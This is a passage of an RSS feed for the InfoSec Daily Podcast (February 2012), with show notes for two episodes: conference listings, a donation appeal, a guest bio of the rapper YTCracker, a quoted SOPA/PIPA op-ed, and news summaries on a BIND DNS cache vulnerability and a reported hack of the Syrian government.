	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.nytimes.com/2012/02/08/opinion/what-wikipedia-wont-tell-you.html?_r=3
	The digital tsunami that swept over the Capitol last month, forcing Congress to set aside legislation to combat the online piracy of American music, movies, books and other creative works, raised questions about how the democratic process functions in the digital age.
	Policy makers had recognized a constitutional (and economic) imperative to protect American property from theft, to shield consumers from counterfeit products and fraud, and to combat foreign criminals who exploit technology to steal American ingenuity and jobs. They knew that music sales in the United States are less than half of what they were in 1999, when the file-sharing site Napster emerged, and that direct employment in the industry had fallen by more than half since then, to less than 10,000. They studied the problem in all its dimensions, through multiple hearings.
	While no legislation is perfect, the Protect Intellectual Property Act (or PIPA) was carefully devised, with nearly unanimous bipartisan support in the Senate, and its House counterpart, the Stop Online Piracy Act (or SOPA), was based on existing statutes and Supreme Court precedents. But at the 11th hour, a flood of e-mails and phone calls to Congress stopped the legislation in its tracks. Was this the result of democracy, or demagoguery?
	Misinformation may be a dirty trick, but it works. Consider, for example, the claim that SOPA and PIPA were &#8220;censorship,&#8221; a loaded and inflammatory term designed to evoke images of crackdowns on pro-democracy Web sites by China or Iran. Since when is it censorship to shut down an operation that an American court, upon a thorough review of evidence, has determined to be illegal? When the police close down a store fencing stolen goods, it isn&#8217;t censorship,[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 592 &#8211; Weekend Wrap-up with Dr. b0n3z  (Interview with YTCracker)</title>
		<link>http://www.isdpodcast.com/episode-592-weekend-wrap-up-with-dr-b0n3z-interview-with-ytcracker</link>
		<comments>http://www.isdpodcast.com/episode-592-weekend-wrap-up-with-dr-b0n3z-interview-with-ytcracker#comments</comments>
		<pubDate>Sun, 12 Feb 2012 02:54:26 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3497</guid>
		<description><![CDATA[&#160; Episode 592 &#8211; Weekend Wrap-up with Dr. b0n3z &#160;(Interview with YTCracker) InfoSec Daily Podcast Episode 592 for February 11, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez and Boris Sverdlik. Guests: hackett, oncee, frontpage, spridel, and connection Special Guest: YT Cracker Announcements: Information Security Blogger Awards 2012 Since we were over looked again for [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<div style="background-color: transparent"><b><span>Episode 592 &#8211; Weekend Wrap-up with Dr. b0n3z &nbsp;(Interview with YTCracker)<br class="kix-line-break" /><br />
	InfoSec Daily Podcast Episode 592 for February 11, 2012. &nbsp;Tonight&#039;s podcast is hosted by Dr. Bonez and Boris Sverdlik.</span></p>
<p>	<span>Guests:</span><br />
	<span>hackett, oncee, frontpage, spridel, and connection</span></p>
<p>	<span>Special Guest:</span><br />
	<span>YT Cracker</span></p>
<p>	</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Announcements:</span></b></p>
<p>	<b><span>Information Security Blogger Awards 2012</span><br />
	<span>Since we were over looked again for the Best Podcast on Security </span><span>you can email </span><a href="mailto:ashimmy@hotmail.com"><span>ashimmy@hotmail.com</span></a><span> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span>http://www.ashimmy.com</span></a><span>.</span></p>
<p>	<span>Brad Smith (theNurse)</span><br />
	<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>
	<span>Social Engineering Training</span><br />
	<span>When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span>When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span>When: August 20-24, 2012</span><br />
	<span>Where: &nbsp;Bristol, UK</span><br />
	<span>When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span>InfoSec Southwest</span><br />
	<span>When: March 30-April 1</span><br />
	<span>Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span>http://www.Infosecsouthwest.com</span></a></p>
<p>	<span>Linuxfest Northwest 2012</span><br />
	<span>When: Saturday, April 28th-29th, 2012</span><br />
	<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
	<span>CFP now open!</span></p>
<p>	<span>AIDE 2012</span><br />
	<span>When: May 21-25, 2012</span><br />
	<span>Where: MU Forensic Science Center</span><br />
	<span>Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
	<span>CFP now open!</span></p>
<p>	<span>LayerOne 2012</span><br />
	<span>When: May 26-27, 2012</span><br />
	<span>Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a><br />
	<span>CFP now open!</span></p>
<p>	<span>DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span>When: &nbsp;September 27-30, 2012</span><br />
	<span>Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></p>
<p>	<span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>
	<span>Bryce Case, Jr. </span><span>(b. August 23, 1982), otherwise known as YTCracker (pronounced &quot;whitey cracker&quot;), is a rapper, former cracker, and Internet entrepreneur. YTCracker began producing rap music in 1998 in the genre that has since become known as nerdcore hip hop. YTCracker is a self-proclaimed &ldquo;jack of all trades&rdquo;, also making a name for himself as a professional disc jockey, computer programmer, graphics designer and webmaster.</span></p>
<p>	<span>In 1999, Bryce gained notoriety for defacing the web site of NASA&rsquo;s Goddard Space Flight Center (wired, cnn) along with other government and commercial websites (a partial list can be found here), including servers maintained by the FAA, the DCAA, NATO, the Colorado Springs Police Department, Texas Department of Public Safety, Honda, Nissan, and AT&amp;T.</span></p>
<p>	<span>YTCracker performs (as both an MC and a DJ) at many events &ndash; most notably, he has DJed in some of the hottest venues in Las Vegas, including Club Ice, the Empire Ballroom, the C2K in the Venetian, the Jet Nightclub in the Mirage, and the Hard Rock Casino&rsquo;s outdoor pool. He has also performed alongside such musical acts as Xzibit, Cypress Hill, Digital Underground, George Clinton. Metal Skool, Naughty by Nature, and Too Short at the infamous Players&rsquo; Ball. He also received a writing credit (credited as &quot;whitey cracker&quot; ) and a shoutout for his contribution to PIMPANDHO.COM, a song by the notorious &ldquo;Mayor of Oakland&rdquo; Too Short on his 2003 album Married to the Game.</span></b></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-592-weekend-wrap-up-with-dr-b0n3z-interview-with-ytcracker/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3497/0/infosec-daily-podcast-episode-592.mp3" length="19839709" type="audio/mpeg" />
		<itunes:duration>0:41:20</itunes:duration>
		<itunes:subtitle>&#160;
Episode 592 &#8211; Weekend Wrap-up with Dr. b0n3z &#160;(Interview with YTCracker)
	InfoSec Daily Podcast Episode 592 for February 11, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez and Boris Sverdlik.
	Guests:
	hackett, oncee, fr[...]</itunes:subtitle>
		<itunes:summary>&#160;
Episode 592 &#8211; Weekend Wrap-up with Dr. b0n3z &#160;(Interview with YTCracker)
	InfoSec Daily Podcast Episode 592 for February 11, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez and Boris Sverdlik.
	Guests:
	hackett, oncee, frontpage, spridel, and connection
	Special Guest:
	YT Cracker
	
Announcements:
	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/

	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.

	Bryce Case, Jr. (b. August 23, 1982), otherwise known as YTCracker (pronounced &#34;whitey cracker&#34;), is a rapper, former cracker, and Internet entrepreneur. YTCracker began producing rap music in 1998 in the genre that has since become known as nerdcore hip hop. YTCracker is a self-proclaimed &#8220;jack of all trades&#8221;, also making a name for himself as a professional disc jockey, computer programmer, graphics designer and webmaster.
	In 1999, Bryce gained notoriety for defacing the web site of NASA&#8217;s Goddard Space Flight Center (wired, cnn) along with other government and commercial websites (a partial list can be found here), including servers maintained by the FAA, the DCAA, NATO, the Colorado Springs Police Department, Texas Department of Public Safety, Honda, Nissan, and AT&#38;T.
	YTCracker performs (as both an MC and a DJ) at many events &#8211; most notably, he has DJed in some of the hottest venues in Las Vegas, including Club Ice, the Empire Ballroom, the C2K in the Venetian, the Jet Nightclub in the Mirage, and the Hard Rock Casino&#8217;s outdoor pool. He has also performed alongside such musical acts as Xzibit, Cypress Hill, Digital Underground, George Clinton. Metal Skool, Naughty by Nature, and Too Short at the infamous Players&#8217; Ball. He also received a writing credit (credited [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 591 &#8211; Revoked Yet Still Resolvable, Assad, FTC, TrustWave &amp; Blackbox Friday</title>
		<link>http://www.isdpodcast.com/episode-591-revoked-yet-still-resolvable-assad-ftc-trustwave-blackbox-friday</link>
		<comments>http://www.isdpodcast.com/episode-591-revoked-yet-still-resolvable-assad-ftc-trustwave-blackbox-friday#comments</comments>
		<pubDate>Sat, 11 Feb 2012 01:49:16 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3492</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 591 for February 10, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.23605550893688332" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 591 for February 10, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.isc.org/software/bind/advisories/cve-2012-1033"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.isc.org/software/bind/advisories/cve-2012-1033</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ISC has been notified by Haixin Duan (a professor at Tsinghua University in Beijing China, who is currently visiting the International Computer Science Institute (ICSI) at the University of California, Berkeley) about a DNS resolver vulnerability. This vulnerability allows a miscreant to keep a domain name in the cache even after it has been deleted from registration and effects all versions of BIND 9. &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tsinghua University researchers discovered </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> a vulnerability affecting the large majority of popular DNS implementations which allows a malicious domain name to stay resolvable long after it has been removed from the upper level servers.&quot; The issue, which is in all versions of BIND 9 to our knowledge, &quot;exploits a vulnerability in DNS cache update policy, which prevents effective domain name revocation. Attackers could cause a malicious domain name to be continuously resolvable even after the delegated data has been deleted from the domain registry and after the TTL associated with entry supposedly expires.&quot; (quoted sections are from the Tsinghua University research document)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://news.sky.com/home/world-news/article/16164146"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.sky.com/home/world-news/article/16164146</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Syrian government&#39;s computer system has reportedly been hacked, to reveal private memos, documents and emails apparently advising President Bashar al Assad on how to tackle reactions to his crackdown on protesters.</span><br />
